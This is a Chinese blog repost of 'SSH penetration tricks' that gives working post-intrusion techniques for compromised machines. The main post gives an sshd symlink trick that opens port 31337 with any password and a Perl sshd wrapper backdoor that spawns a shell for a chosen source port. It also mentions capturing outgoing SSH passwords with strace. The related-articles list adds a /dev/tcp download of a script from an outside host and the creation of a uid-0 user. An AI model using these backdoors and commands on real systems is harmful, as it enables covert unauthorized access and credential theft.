渗透技巧之ssh

最新推荐文章于 2024-05-13 11:03:44 发布
最新推荐文章于 2024-05-13 11:03:44 发布
阅读量799 收藏
点赞数
分类专栏: linux

原文地址:http://www.anquan.us/static/drops/tips-1951.html

1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口

肉鸡上执行

mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。

效果图:

enter image description here

2. 做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接

在肉鸡上执行:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

在本机执行:

socat STDIO TCP4:10.18.180.20:22,sourceport=13377

如果你想修改源端口,可以用python的struct标准库实现

>>> import struct
>>> buffer = struct.pack('>I6',19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I6',13377)
>>> print buffer
4A

效果图如下:

enter image description here

3. 记录SSH客户端连接密码

搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。

效果图:

enter image description here


huyangg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssh--渗透
qq_49694748的博客
01-09 2332
SSH 为 Secure Shell的缩写,SSH建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议 从客户端来看,SSH提供两种级别的安全验证 第一种级别(基于口令的安全验证) 第二种级别(基于密匙的安全验证) SSH配置文件位置:/etc/ssh/sshd_config SSH对应服务名称:sshd .ssh目录存在于用户的根目录 1、 sshsshd的区别 2、 ssh常用配置参数 3、 信息收集-nmap 4、 ss.
渗透linux的ssh,Linux渗透技巧SSH
weixin_42302384的博客
05-12 546
1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。效果图:2. 做一个SSH wrapper后门,效果比第一个好,...
渗透测试笔记】之【内网渗透——应用层隧道(SSH隧道的使用:本地、远程端口转发(1)
最新发布
2401_84970145的博客
05-13 558
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
一、渗透思路系列 -- SSH
Peter 的博客
01-22 1467
本系列文章旨在对于有一定网络安全基础的人员,在日常工作中针对一些中间件、web应用、系统漏洞… 提供渗透思路。请勿应用非法途径。 暴力破解 SSH 支持弱加密算法漏洞(SSH Weak Algorithms Supported) ...
SSH服务渗透
wysw1998的博客
08-03 2410
1.已知攻击靶场的IP //探测靶场开放的服务与服务的版本 nmap -sV 靶场IP //探测靶场全部信息 nmap -A -v IP //探测靶场的操作系统类型与版本 nmap -O IP config是配置文件,里面可能有用户名和密码 这是第一次启动metasploit的情形,回车是默认选项 返回每一条登陆信息 开启破解,获得答案hadi123,时间还是...
Linux ***小常识
weixin_34092455的博客
06-08 79
1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl 2.Linux添加uid为0的用户useradd -o -u 0 cnbird 3....
渗透技术详解
06-10
渗透技术详解
E011-渗透测试常用工具-使用SSHMitm中间人拦截SSH.pdf
12-02
在这个过程中,渗透测试人员使用各种工具和技术来模拟攻击,以便发现并修复潜在的安全风险。在本课程"**E011-渗透测试常用工具-使用SSHMitm中间人拦截SSH**"中,我们将探讨如何利用SSHMitm工具进行中间人攻击,特别...
SSH考试报名系统.rar
01-04
SSH考试报名系统是一个基于Secure Shell (SSH)技术的在线报名平台。SSH,全称为Secure SHell,是一种网络协议,用于在不安全的网络环境中提供安全的远程登录和其他服务。在这个系统中,SSH主要被用来确保数据传输的...
vulhub渗透测试靶机学习1
08-08
渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的分析和攻击。 首先,...
内网渗透测试安全学习ppt
02-12
5. **社会工程学**:在某些情况下,内网渗透可能涉及社会工程学技巧,如钓鱼邮件、电话欺骗等,以获取员工的登录凭证或其他敏感信息。 6. **横向移动**:一旦获得一个系统的访问权,渗透测试者会尝试在内网中横向...
渗透思路
土拨鼠挖洞中的博客
10-06 888
            4. 公司获得授权对一家金融公司从外网做白盒测试,目标是取得内网域控权限及核心业务系统权限,请具体描述您的渗透步骤。   第一步,明确目标并进行信息收集:   包括但不限于: whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、...
ssh服务渗透(拿到第一个用户权限)
weixin_43803070的博客
07-19 1580
** ssh基础知识: ** ** 一、信息收集 ** 探测开放端口服务 root@kali:~# nmap -sV 192.168.1.107 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:04 CST Nmap scan report for 192.168.1.107 Host is up (0.00013s l...
我要偷偷的学渗透,然后惊讶所有人(ssh服务渗透)
qq_20765511的博客
03-10 4649
准备需要的靶机 这次也是ssh服务的靶机,有需要或者感兴趣的家人们可以私信我,放心没有什么广告收费什么的,都是免费的 kali IP 192.168.43.105 靶机 IP:192.168.43.59 我之前的文章有怎么教获取靶机的IP 渗透第一步,先扫描信息 这里使用 nmap -sV IP 开放的服务和服务信息 nmap -sV 192.168.43.59 这里开放了三个端口,其中有80端口,可以去看看网址上有什么信息 这里可以看到这可能是用户名,可以先记着 随后在来深入的扫描一下 dirb
SSH弱口令渗透测试
weixin_66469999的博客
10-19 2137
SSH弱口令渗透测试
web渗透--ssh环境搭建、banner获取。爆破口令、安全防范
朝阳似锦 晖映山河
08-28 464
一、SSH环境搭建 1、Ubuntu搭建ssh服务端 1)、安装软件openssh-server(apt-get install openssh-server) 2)、ssh服务端服务启动与关闭 service ssh start 启动 service ssh status 状态获取 service ssh stop 关闭 ...
网络安全: Kali Linux 进行 SSH 渗透与防御
cronaldo91的博客
03-06 1866
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本。(1)扫描⽬标主机所在⽹段所有存活的主机。192.168.204.154(动态)(17)SSH安全配置(容错次数)( 14)SSH安全配置(端口)(1)SSH安全配置(端口)(5)进入MSF 控制台。(8)设置用户名与密码本。(16)验证(等待1分钟)(1)进入MSF 控制台。(5)设置用户名与密码本。(10)nmap扫描端口。
渗透&&探测 (之SSH密码暴破)
weixin_34294649的博客
09-30 907
什么是SSH?   简单说,SSH是一种 网络协议,用于计算机之间的 加密登录。   如果一个用户从本地计算机,使用SSH协议 登录 另一台远程计算机,我们就可以认为,这种登录是 安全 的,即使 被中途截获,密码也 不会泄露。   最早的时候,互联网通信都是 明文通信,一旦被截获,内容就 暴露无疑。1995年,芬兰学者Tatu Ylonen设计了SSH协议,将登录信息 全部加密,成为互联网安全的一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值